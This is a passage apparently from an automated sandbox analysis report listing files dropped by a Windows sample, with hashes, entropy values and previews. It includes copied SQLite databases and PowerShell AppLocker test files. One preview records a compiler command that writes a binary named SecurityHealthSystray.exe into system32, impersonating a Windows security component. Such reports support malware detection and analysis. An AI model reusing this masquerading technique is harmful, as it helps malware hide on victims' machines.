                                                                                              Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.0.cs"

                                                                                              C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.out

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (329), with CRLF, CR line terminators
                                                                                              Category:modified
                                                                                              Size (bytes):750
                                                                                              Entropy (8bit):5.266793924200971
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:KJN/I/u7L//TRq79cQWfkKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBI/un/Vq79tWfkKax5DqBVKVrdFAMb
                                                                                              MD5:975A81E15C357205543CAA5793B3C638
                                                                                              SHA1:59BDCC0794AD3F68E54BD645E7DFF4D24573DD24
                                                                                              SHA-256:5AA5490D0B3C0D03E04D03002394F3902EDB8B0F5B637AE57C2C1EE2551E001F
                                                                                              SHA-512:76552FCA813D5EA46E5C40D26B74D911CAABFC9685A5B5E3B123D874EA9FAF613B303606B7ED76BF1B94B85CFA811CCC1EA1BC681CE67F57D136B29DBA43207E
                                                                                              Malicious:false
                                                                                              Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                              C:\Users\user\AppData\Local\Temp\2t4m6Txpg0

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                              Category:dropped
                                                                                              Size (bytes):114688
                                                                                              Entropy (8bit):0.9746603542602881
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\6bRjdXvoM1

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                              Category:dropped
                                                                                              Size (bytes):106496
                                                                                              Entropy (8bit):1.1358696453229276
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\8MNAVa6rsv

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                              Category:dropped
                                                                                              Size (bytes):114688
                                                                                              Entropy (8bit):0.9746603542602881
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\Dd11T4l8sP

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):25
                                                                                              Entropy (8bit):4.243856189774724
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:wZRpl7:gt7
                                                                                              MD5:BA16BE96B86AFA09A37E32788454567A
                                                                                              SHA1:4B6E14DF48158984C949CC91AB2A212446950513
                                                                                              SHA-256:3A49D7418DA93CE97597842302916F6AAEE1072923940CAD6BAB270530EE509A
                                                                                              SHA-512:1E6AEE9A8BD22567E3049DBB59E6DC363323626B06C5F2BAB10B1416226F2437DB8678B3A23F3EBAAF77C19EA7F01690951920995BDDD0782F7BC59D8D7D9C68
                                                                                              Malicious:false
                                                                                              Preview:0z991UazooL7srtCt4LjHiNKu

                                                                                              C:\Users\user\AppData\Local\Temp\EsTN8JE6h5

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                              Category:dropped
                                                                                              Size (bytes):20480
                                                                                              Entropy (8bit):0.5707520969659783
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\GuJHQLrwJI

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                              Category:dropped
                                                                                              Size (bytes):20480
                                                                                              Entropy (8bit):0.5707520969659783
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\HBLwIJreJb

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                              Category:dropped
                                                                                              Size (bytes):20480
                                                                                              Entropy (8bit):0.5712781801655107
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\RES39B.tmp

                                                                                              Download File
                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e4, 10 symbols, created Mon Dec 9 16:51:39 2024, 1st section name ".debug$S"
                                                                                              Category:dropped
                                                                                              Size (bytes):1948
                                                                                              Entropy (8bit):4.560366702154968
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:HC9G9E1XOrMfH1wKEsmN0luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+YEgUZ:nrY2KhmyluOulajfqXSfbNtmhY2Z
                                                                                              MD5:D4E859E2DEACEC6450BD762A8EC7B0C8
                                                                                              SHA1:9310AF5B399E661472E1CB3F984E09DC42A21196
                                                                                              SHA-256:A49B3F9A30B53001B5298370AE43A7154CBD9D28C6EB51A0066B866CB09A6217
                                                                                              SHA-512:49FB03123911082367E7D97AEA5AE5598CDF6CB5C7B225B06B990D8C5C26E5ACAD6356A53253F2C8724EC5893294CD3021FA7FC61F83C8DE611857431F80733D
                                                                                              Malicious:false
                                                                                              Preview:L.... Wg.............debug$S........4...................@..B.rsrc$01................`...........@..@.rsrc$02........p...t...............@..@........<....c:\Windows\System32\CSC5AB1265740184DDC93ABA6EF26458DB.TMP..................r.av..t.y..............3.......C:\Users\user\AppData\Local\Temp\RES39B.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.

                                                                                              C:\Users\user\AppData\Local\Temp\UOoF5jPXKL

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                              Category:dropped
                                                                                              Size (bytes):40960
                                                                                              Entropy (8bit):0.8553638852307782
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\WvVYp1KlRp

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):25
                                                                                              Entropy (8bit):4.403856189774723
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:zn3YRSQ21:L38Sj1
                                                                                              MD5:798746746207809C61D7DC5436125F16
                                                                                              SHA1:679DFADA65F78B6E9A4703C8062BD16561DEF024
                                                                                              SHA-256:BC9B080A051AF7DB1221173C61F93920F3CD21CA513D57174B43289C5FE8CAEC
                                                                                              SHA-512:F29E5B1C74A2933525659CE6E8B56A714742D0A4A5C7E4C7DADFF75DF97578B5BCEF243183C08215CE560F1216ACCE6E146FD4B4CCF8ED7A5DF03A6227ED9CE1
                                                                                              Malicious:false
                                                                                              Preview:Nfu3BRjdJ3FAyZvtis5Ktm5SP

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1jo1nbes.i5r.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ms3v102.dqs.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_420ocmp2.b42.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4p3oanfk.bhh.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4wwgu012.0im.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bj3c0p42.vwa.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bryh4msi.20g.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ci0j3zhf.e1u.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cofia02x.gy3.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g2imdvgh.vyi.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gqz2g2zi.rdd.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_igtandpm.c10.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jo3jshxk.iul.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o3zckvmj.oky.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ofaluv3y.e45.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
